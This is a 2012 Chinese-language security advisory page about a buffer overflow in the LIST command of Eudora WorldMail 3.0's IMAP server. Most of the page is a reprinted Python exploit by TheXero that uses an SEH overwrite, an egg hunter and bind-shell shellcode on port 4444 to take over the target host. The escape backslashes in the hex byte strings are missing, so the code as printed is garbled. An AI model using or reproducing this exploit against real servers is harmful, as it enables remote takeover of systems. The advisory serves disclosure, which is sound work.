发布日期:2012-01-12
更新日期:2012-01-16受影响系统:
Eudora WorldMail 3.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51403Eudora WorldMail是一款Windows平台下的邮件服务器软件。Eudora WorldMail在LIST命令的实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞执行任意代码,进而控制应用和下层系统。<*来源:TheXero
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!TheXero ()提供了如下测试方法:#!/usr/bin/python
import sys
import socket## Exploit Title: WorldMail imapd 3.0 SEH overflow (egg hunter)
## Tested on: XP SP3 en-us
## Author: TheXero
## Website: www.thexero.co.uk
## http://www.nullsecurity.net## Check for parameters
if len(sys.argv) != 3:
print "Usage: " + sys.argv[0] + " 127.0.0.1 143"
quit()## Assigns the parameters
target = sys.argv[1]
port = int(sys.argv[2])## Sets up the socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)## Sets the variables
char = "}"
nseh = "xebx06x90x90"
seh = "x4ex3bx01x10" ## 10013B4E |. 59 POP ECX mailcmn.dll
buffer = "x90" * 8
shellcode = ("T00WT00W" ## Bindshell port 4444
"xbdxe8x39x05xa5xdbxdbxd9x74x24xf4x58x29xc9xb1"
"x56x31x68x13x03x68x13x83xc0xecxdbxf0x59x04x92"
"xfbxa1xd4xc5x72x44xe5xd7xe1x0cx57xe8x62x40x5b"
"x83x27x71xe8xe1xefx76x59x4fxd6xb9x5ax61xd6x16"
"x98xe3xaax64xccxc3x93xa6x01x05xd3xdbxe9x57x8c"
"x90x5bx48xb9xe5x67x69x6dx62xd7x11x08xb5xa3xab"
"x13xe6x1bxa7x5cx1ex10xefx7cx1fxf5xf3x41x56x72"
"xc7x32x69x52x19xbax5bx9axf6x85x53x17x06xc1x54"
"xc7x7dx39xa7x7ax86xfaxd5xa0x03x1fx7dx23xb3xfb"
"x7fxe0x22x8fx8cx4dx20xd7x90x50xe5x63xacxd9x08"
"xa4x24x99x2ex60x6cx7ax4ex31xc8x2dx6fx21xb4x92"
"xd5x29x57xc7x6cx70x30x24x43x8bxc0x22xd4xf8xf2"
"xedx4ex97xbex66x49x60xc0x5dx2dxfex3fx5dx4exd6"
"xfbx09x1ex40x2dx31xf5x90xd2xe4x5axc1x7cx56x1b"
"xb1x3cx06xf3xdbxb2x79xe3xe3x18x0cx23x2ax78x5d"
"xc4x4fx7ex70x48xd9x98x18x60x8fx33xb4x42xf4x8b"
"x23xbcxdexa7xfcx2ax56xaex3ax54x67xe4x69xf9xcf"
"x6fxf9x11xd4x8exfex3fx7cxd8xc7xa8xf6xb4x8ax49"
"x06x9dx7cxe9x95x7ax7cx64x86xd4x2bx21x78x2dxb9"
"xdfx23x87xdfx1dxb5xe0x5bxfax06xeex62x8fx33xd4"
"x74x49xbbx50x20x05xeax0ex9exe3x44xe1x48xbax3b"
"xabx1cx3bx70x6cx5ax44x5dx1ax82xf5x08x5bxbdx3a"
"xddx6bxc6x26x7dx93x1dxe3x8dxdex3fx42x06x87xaa"
"xd6x4bx38x01x14x72xbbxa3xe5x81xa3xc6xe0xcex63"
"x3bx99x5fx06x3bx0ex5fx03")## Calculates the size of junk depending on the shellcode
junk = "x41" * (769 - len(shellcode))## Egg Hunter
hunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05"
"x5ax74xefxb8x54x30x30x57x8bxfaxafx75xeaxafx75xe7xffxe7")## Assembles the buffer
buffer = char + junk + shellcode + nseh + seh + hunter + char## Connects
s.connect((target,port))
data=s.recv(1024)
s.send("a001 LIST " + buffer + "
")
s.close()建议:
--------------------------------------------------------------------------------
厂商补丁:Eudora
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.eudora.com/worldmail/ISC DHCP Server DHCPv6 NULL指针引用拒绝服务漏洞VMware Hosted产品VirtualCenter Update 3多个安全漏洞(VMSA-2008-0016.3)相关资讯 Eudora WorldMail 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
-
|
易网时代-编程资源站